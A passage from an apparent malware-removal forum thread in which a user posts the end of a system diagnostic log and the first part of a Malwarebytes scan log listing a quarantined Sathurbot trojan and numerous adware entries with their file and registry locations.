TypeScript Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{BA5762C7-D35F-4725-A4BD-525854127018}) (Version: 1.8.36.0 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{284FA9A0-CEDD-81D3-5A19-5858E95FD0C4}) (Version: 10.0.10150 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{F6483AD1-9703-F95E-B07B-6BB7A3DA7B71}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{96FB0EE4-8F7E-595E-B5CF-BFCC6BF26014}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{ABD37F71-FC3F-F525-C7B3-BDD95F684C51}) (Version: 10.0.10150 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{302A9B8D-5111-6C51-BB99-FF394C4A4255}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{2D359C7E-59C8-79A9-5157-FE9E189F5E8A}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{71436CD5-3E63-CEE9-FC00-5124A5C9A931}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{87F42CC0-5403-3698-87D9-3C2A04E476E1}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.2 - VideoLAN)
VS Update core components (HKLM-x32\...\{B2918D01-1D89-34D3-87EF-A28121BC6EB7}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
vs_update3notification (HKLM-x32\...\{AB3DF932-C990-34D4-BF43-970F760DA3CD}) (Version: 14.0.25431 - Microsoft Corporation) Hidden
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinAppDeploy (HKLM-x32\...\{1182888E-EDC9-05C5-33BD-B61DA5B1F916}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
Windows 8 Codecs Pack 1.0.0 (HKLM\...\w8cpsetup_is1) (Version: 1.0.0 - Web Solution Mart)
Windows Driver Package - ASUS (ATP) Mouse  (09/17/2013 1.0.0.186) (HKLM\...\D9E691DCEE7D3B9B7C62A7F5C2EAABBB9335DC9A) (Version: 09/17/2013 1.0.0.186 - ASUS)
Windows Driver Package - ASUS (ATP) Mouse  (11/11/2015 1.0.0.262) (HKLM\...\A044C5901003C24E6891688653ABA1068D04A1A0) (Version: 11/11/2015 1.0.0.262 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{45D392D2-5956-4646-9CA6-83CBF67507B6}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.14393.33 (HKLM-x32\...\{f23f94c5-8bba-4202-85ad-c83d4402cdc1}) (Version: 10.1.14393.33 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinRAR 5.11 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{01F53182-F1C8-8A72-5C86-B6612BDD4815}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{2AC000E5-E5E6-75B7-7FC2-9ECA8C57CA98}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{6DF5B5E1-A8A0-B617-AADB-31C3709A3C41}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{1AAB8359-4433-FF39-D420-0AD429993AD7}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{CB7AC790-0E8B-D6C9-CE1E-655793E7D541}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{87775501-5259-6A7C-51A6-71C832DB7ABA}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{CFD0294B-945D-62E4-7959-9B22A160496F}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{F75FD5E5-1F33-AE2B-715A-F829F8A8F51D}) (Version: 10.1.14393.33 - Microsoft Corporation) Hidden
WinSCP 5.5.6 (HKLM-x32\...\winscp3_is1) (Version: 5.5.6 - Martin Prikryl)
WinZip 19.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E7}) (Version: 19.0.11294 - WinZip Computing, S.L. )
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (HKLM\...\{25FB53C5-BE4C-3B6C-A0C9-D49A39227E1E}) (Version: 11.0.51108 - Microsoft Corporation) Hidden
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (HKLM-x32\...\{68DC347D-C1C0-3DE2-A53E-CCC71DA53E57}) (Version: 11.0.51108 - Microsoft Corporation) Hidden
Языковой пакет для среды разработки набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 - RUS (HKLM-x32\...\{5268600F-1B2F-3273-A335-EFD9D1698385}) (Version: 11.0.51108 - Microsoft Corporation) Hidden
 
========================= Devices: ================================
 
 
========================= Memory info: ===================================
 
Percentage of memory in use: 41%
Total physical RAM: 8077.74 MB
Available physical RAM: 4733.39 MB
Total Virtual: 9421.74 MB
Available Virtual: 5643.7 MB
 
========================= Partitions: =====================================
 
1 Drive c: (OS) (Fixed) (Total:372.6 GB) (Free:3.63 GB) NTFS
2 Drive d: (DATA) (Fixed) (Total:341.51 GB) (Free:303.39 GB) NTFS
4 Drive f: (Media) (Fixed) (Total:196.29 GB) (Free:172.01 GB) NTFS
 
========================= Users: ========================================
 
User accounts for \\LASZLO
 
Administrator            DefaultAccount           Guest                    
Lac                      Mirna                    
 
========================= Restore Points ==================================
 
 
**** End of log ****


#7 Lasz100

Lasz100
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:03:07 PM

Posted 28 February 2017 - 02:31 PM

The output from Malwarebytes is very long and I do not know how to attach it...

I will send it in 2 or 3 posts if thats ok?

 

First part:

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 2/28/17
Scan Time: 11:23 AM
Logfile: mal.txt
Administrator: Yes
 
-Software Information-
Version: 3.0.6.1469
Components Version: 1.0.50
Update Package Version: 1.0.1064
License: Trial
 
-System Information-
OS: Windows 10
CPU: x64
File System: NTFS
User: LASZLO\Lac
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 935359
Time Elapsed: 17 min, 58 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
-Scan Details-
Process: 1
PUP.Optional.Amazon1Button.AppFlsh, C:\PROGRAM FILES (X86)\AMAZON\AMAZON1BUTTONAPP\Amazon1ButtonService64.Exe, Quarantined, [1755], [333344],1.0.1064
 
Module: 2
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll, Quarantined, [2851], [355073],1.0.1064
PUP.Optional.Amazon1Button.AppFlsh, C:\PROGRAM FILES (X86)\AMAZON\AMAZON1BUTTONAPP\Amazon1ButtonService64.Exe, Quarantined, [1755], [333344],1.0.1064
 
Registry Key: 39
Trojan.Sathurbot.E, HKLM\SOFTWARE\CLASSES\CLSID\{3B5B973C-92A4-4855-9D3F-0F3D23332208}, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, HKLM\SOFTWARE\CLASSES\CLSID\{3B5B973C-92A4-4855-9D3F-0F3D23332208}\InprocServer32, Delete-on-Reboot, [2851], [355073],1.0.1064
PUP.Optional.SupTab, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}, Quarantined, [4009], [168876],1.0.1064
PUP.Optional.SupTab, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}, Quarantined, [4009], [168876],1.0.1064
PUP.Optional.SupTab, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}, Quarantined, [4009], [168876],1.0.1064
PUP.Optional.SupTab, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}, Delete-on-Reboot, [4009], [168876],1.0.1064
PUP.Optional.SupTab, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}, Quarantined, [4009], [168876],1.0.1064
PUP.Optional.BlockAndSurf, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Quarantined, [12575], [-1],0.0.0
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{46AC11F3-7BF7-494B-8176-18579314E925}, Quarantined, [436], [258202],1.0.1064
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4C9AE105-7F31-4A0B-8F42-1A57E29E6238}, Quarantined, [436], [258203],1.0.1064
PUP.Optional.DigitalSites, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{77677723-30D7-4885-976F-0579625A6D92}, Quarantined, [1041], [258411],1.0.1064
PUP.Optional.MyPCBackup, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7EA0085A-B029-4431-BBA2-FD970A47DCEE}, Quarantined, [308], [315079],1.0.1064
PUP.Optional.BrowserSafeGuard, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9FD428A9-78CC-4FA0-B67C-FB8547F2CC06}, Quarantined, [344], [304522],1.0.1064
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{ACD81015-BF82-40C6-81AB-36B8CE2F8CDF}, Quarantined, [436], [184169],1.0.1064
PUP.Optional.Linkey.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\fpmeembnagmagppkgghhfjfdfajdfcah, Delete-on-Reboot, [15075], [254238],1.0.1064
PUP.Optional.PCKeeper, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\KROMTECH\PCKeeper, Quarantined, [1061], [241574],1.0.1064
PUP.Optional.BrowserSafeGuard, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\BrowserSafeguard Update Task, Delete-on-Reboot, [344], [304516],1.0.1064
PUP.Optional.DigitalSites, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Digital Sites, Delete-on-Reboot, [1041], [237781],1.0.1064
PUP.Optional.CrossRider, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Installer_iwebar, Delete-on-Reboot, [307], [184374],1.0.1064
PUP.Optional.Sense, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Installer_sense, Delete-on-Reboot, [1868], [334830],1.0.1064
PUP.Optional.MyPCBackup, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\LaunchSignup, Delete-on-Reboot, [308], [315080],1.0.1064
PUP.Optional.ShopperPro, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ShopperPro, Delete-on-Reboot, [1046], [186755],1.0.1064
PUP.Optional.ShopperPro, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ShopperProJSUpd, Delete-on-Reboot, [1046], [186756],1.0.1064
PUP.Optional.ShopperPro, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SPDriver, Delete-on-Reboot, [1046], [186757],1.0.1064
PUP.Optional.SpeeDial, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Speedial, Delete-on-Reboot, [16940], [235138],1.0.1064
PUP.Optional.ProductSetup, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\PRODUCTSETUP, Delete-on-Reboot, [17435], [242047],1.0.1064
PUP.Optional.SupraSavings, HKU\S-1-5-18\SOFTWARE\APPDATALOW\SOFTWARE\Supra Savings, Delete-on-Reboot, [12194], [243688],1.0.1064
PUP.Optional.PCKeeper, HKLM\SOFTWARE\KROMTECH\PCKeeper, Delete-on-Reboot, [1061], [241576],1.0.1064
PUP.Optional.DoSearch.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\do-searchSoftware, Delete-on-Reboot, [13947], [192840],1.0.1064
PUP.Optional.SettingsManager, HKLM\SOFTWARE\WOW6432NODE\SmdmF, Delete-on-Reboot, [9083], [242950],1.0.1064
PUP.Optional.Amazon1Button.AppFlsh, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\Amazon 1Button App Service, Quarantined, [1755], [333344],1.0.1064
PUP.Optional.DoSearch.ShrtCln, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}, Quarantined, [13947], [187045],1.0.1064
PUP.Optional.DoSearch.ShrtCln, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{83382288-D966-416B-AB3C-47A0025C6C5B}, Quarantined, [13947], [187045],1.0.1064
PUP.Optional.DoSearch.ShrtCln, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{E733165D-CBCF-4FDA-883E-ADEF965B476C}, Quarantined, [13947], [187045],1.0.1064
PUP.Optional.Yontoo, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Update Between Lines, Quarantined, [71], [254064],1.0.1064
PUP.Optional.WindowsMangerProtect, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\WindowsMangerProtect, Quarantined, [17790], [245008],1.0.1064
PUP.Optional.Distromatic, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\Distromatic, Quarantined, [2985], [359638],1.0.1064
PUP.Optional.InstallCore, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\InstallCore, Quarantined, [8], [239563],1.0.1064
PUP.Optional.WeDownLoadManager, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\WeDlMngr, Quarantined, [17782], [244935],1.0.1064
 
Registry Value: 24
PUP.Optional.BlockAndSurf, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Removal Failed, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\S-1-5-21-971398213-2469251586-1946301387-1026\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\S-1-5-80-1337333740-2787872843-2774717225-1767203911-559312492\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\S-1-5-80-3642287774-1615985598-572449333-1370030010-3123895339\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.BlockAndSurf, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [12575], [-1],0.0.0
PUP.Optional.Linkey.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Quarantined, [14740], [-1],0.0.0
PUP.Optional.Linkey.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Quarantined, [14740], [-1],0.0.0
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{46AC11F3-7BF7-494B-8176-18579314E925}|PATH, Quarantined, [436], [258202],1.0.1064
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4C9AE105-7F31-4A0B-8F42-1A57E29E6238}|PATH, Quarantined, [436], [258203],1.0.1064
PUP.Optional.DigitalSites, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{77677723-30D7-4885-976F-0579625A6D92}|PATH, Quarantined, [1041], [258411],1.0.1064
PUP.Optional.MyPCBackup, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7EA0085A-B029-4431-BBA2-FD970A47DCEE}|PATH, Quarantined, [308], [315079],1.0.1064
PUP.Optional.BrowserSafeGuard, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9FD428A9-78CC-4FA0-B67C-FB8547F2CC06}|PATH, Quarantined, [344], [304522],1.0.1064
PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{ACD81015-BF82-40C6-81AB-36B8CE2F8CDF}|PATH, Quarantined, [436], [184169],1.0.1064
Trojan.Fileless.MTGen, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^JFVP, Quarantined, [452], [339967],1.0.1064
PUP.Optional.ProductSetup, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\PRODUCTSETUP|TB, Delete-on-Reboot, [17435], [242047],1.0.1064
PUP.Optional.DoSearch.ShrtCln, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}|URL, Quarantined, [13947], [187045],1.0.1064
PUP.Optional.DoSearch.ShrtCln, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}|FAVICONURL, Quarantined, [13947], [187045],1.0.1064
PUP.Optional.DoSearch.ShrtCln, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{83382288-D966-416B-AB3C-47A0025C6C5B}|URL, Quarantined, [13947], [187045],1.0.1064
PUP.Optional.DoSearch.ShrtCln, HKU\S-1-5-21-971398213-2469251586-1946301387-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{E733165D-CBCF-4FDA-883E-ADEF965B476C}|URL, Quarantined, [13947], [187045],1.0.1064
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 236
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\ProblemFinder, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\ProgramData\Kromtech\PCKeeper\Minidumps, Quarantined, [1060], [178837],1.0.1064
PUP.Optional.PCKeeper, C:\PROGRAMDATA\Kromtech\PCKeeper, Quarantined, [1060], [178837],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dab3302070f8e886220313eae12694e, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\661b0595c94df273a12dd98fdc0668d5, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\667cf4fefa31563c464ffd08433c8d97, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\02b08cc11c5281e6d56d75c3e5ec6f6f, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\046134dc081d4e4bd60228d94b4a07ad, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\06a0c344dcc4ebb5d62009a224e61685, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\06acf43cdbcc688223b6bd2ac8dda023, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0a0c265a8fe0019c50ef44989aad9f4c, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0a3b52a14ec94499246e603d7c967daf, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0be17d8f6bd1655f15541dd32c994fd8, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0c562f6570fa8511b5aff91dae1df22f, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0eeef81f31c54974191c3180e7c559b8, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\0f9a9a82cbd1c7ca7783d2700bdbd06b, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\144aaba2a6a3a7024a71ade8f80dec76, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\14aafd8e07a9d2946637c94ef37d7480, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\169a3337025eed0ae46ef21ac9f029da, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\75fe5ecb00a0dcdcb2ebb33eeeafdb14, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\766ea216db4e132842f5f88dff5f4102, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\76aab28808169629449f7b5b28dd1832, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\77711852ea1271f21e48fd93d6b460ed, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7845b238fba0d738febc6b8d75a76b19, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\785926353aace0cc149794b21ccc8c18, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\79c0273e316f7a0dc2dd98323942d7f1, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7bc7a84ed845669c6eed879826be7fbc, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7c416188c1a8b9f7a8ff4609a83e02b4, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7cde92506819f51e710688643e7873e9, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b993a99472521cbdaeeeb07bfbc5ef99, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dc7aa964a3778773926ce47d3ed6bc7, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d689be2c56c9bef8cd92cf62e665ba1a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d83514de16706316d5a5f1caef8d2b36, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d8f7b2e0e75b2750819e98aeabdb125d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\daafc1ea4f1c3d7d6bcbbad50a4a8ea3, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\dd4971dcc1fffa4e94555637edd79abf, Delete-on-Reboot, [2851], [355073],1.0.1064
